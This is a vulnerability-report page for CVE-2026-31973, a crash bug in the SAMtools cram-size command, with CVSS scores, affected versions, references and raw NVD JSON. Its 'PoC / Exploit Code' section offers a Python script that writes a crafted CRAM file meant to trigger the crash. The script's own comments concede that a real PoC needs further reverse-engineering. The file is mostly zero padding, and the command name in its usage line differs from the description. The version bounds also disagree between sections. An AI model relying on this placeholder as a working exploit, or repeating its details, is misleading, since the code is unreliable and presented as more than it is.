Security Vulnerability Report
CVE-2026-31973 CVSS 7.5 HIGH

Published: 2026-03-18 21:16:26
Last Modified: 2026-03-19 18:48:11

Description

SAMtools is a program for reading, manipulating and writing bioinformatics file formats. Starting in version 1.17, the cram-size command, used to write information about how well CRAM files are compressed, was missing a check of the return value of `cram_decode_compression_header()`. If that function returned an error, the missing check led to a NULL pointer dereference. Exploiting this bug causes a NULL pointer dereference, which typically crashes the program. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:samtools:samtools:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:samtools:samtools:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:samtools:samtools:1.23:*:*:*:*:*:*:* - VULNERABLE
SAMtools 1.17 <= version < 1.21.1
SAMtools 1.17 <= version < 1.22.2
SAMtools 1.17 <= version < 1.23.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC (proof of concept) - triggers a SAMtools NULL pointer dereference
# This PoC is for security research and vulnerability testing only
# Usage: samtools cram_size malicious.cram
# Construct a CRAM file intended to trigger the vulnerability (hex representation)
# A real PoC would require reverse-engineering the CRAM format and constructing specific data
import struct


def generate_poc_cram():
    """Generate a CRAM test file intended to trigger CVE-2026-31973"""
    # CRAM file header
    header = b'CRAM'                    # Magic number
    header += struct.pack('>I', 3)      # Version 3
    header += struct.pack('>I', 1000)   # File ID
    # Construct the compression container - meant to make cram_decode_compression_header() fail
    container = bytearray()
    container += b'\x00' * 50           # Padding data
    with open('poc.cram', 'wb') as f:
        f.write(header + container)
    print('PoC file generated: poc.cram')
    print('执行: samtools cram_size poc.cram')


if __name__ == '__main__':
    generate_poc_cram()
```

References

https://github.com/samtools/samtools/commit/06fc2a219b3d7c94d3f412c09f6d1efd51199f2f - Patch
https://github.com/samtools/samtools/security/advisories/GHSA-x86f-q6fj-cm43 - Vendor Advisory
http://www.openwall.com/lists/oss-security/2026/03/18/12 - Mailing List, Third Party Advisory
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-31973", "sourceIdentifier": "[email protected]", "published": "2026-03-18T21:16:26.250", "lastModified": "2026-03-19T18:48:10.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAMtools is a program for reading, manipulating and writing bioinformatics file formats. Starting in version 1.17, in the cram-size command, used to write information about how well CRAM files are compressed, a check to see if the `cram_decode_compression_header()` was missing. If the function returned an error, this could lead to a NULL pointer dereference. Exploiting this bug causes a NULL pointer dereference. Typically this will cause the program to crash. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue."}, {"lang": "es", "value": "SAMtools es un programa para leer, manipular y escribir formatos de archivo bioinformáticos. A partir de la versión 1.17, en el comando cram-size, utilizado para escribir información sobre qué tan bien se comprimen los archivos CRAM, se omitió una comprobación para ver si 'cram_decode_compression_header()' estaba ausente. Si la función devolvía un error, esto podría llevar a una desreferenciación de puntero NULL. Explotar este error causa una desreferenciación de puntero NULL. Típicamente, esto hará que el programa falle. Las versiones 1.23.1, 1.22.2 y 1.21.1 incluyen correcciones para este problema. No hay una solución alternativa para este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samtools:samtools:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.17", "versionEndIncluding": "1.21.1", "matchCriteriaId": "2AAB5401-9187-4F27-A463-B52558DE6D9D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:samtools:samtools:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.22", "versionEndExcluding": "1.22.2", "matchCriteriaId": "AD12CAC6-5A57-435F-991C-FFA0DB2F3400"}, {"vulnerable": true, "criteria": "cpe:2.3:a:samtools:samtools:1.23:*:*:*:*:*:*:*", "matchCriteriaId": "7FAB480A-76D2-4850-B9D0-4D7F9C32B8C4"}]}]}], "references": [{"url": "https://github.com/samtools/samtools/commit/06fc2a219b3d7c94d3f412c09f6d1efd51199f2f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/samtools/samtools/security/advisories/GHSA-x86f-q6fj-cm43", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/18/12", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}
```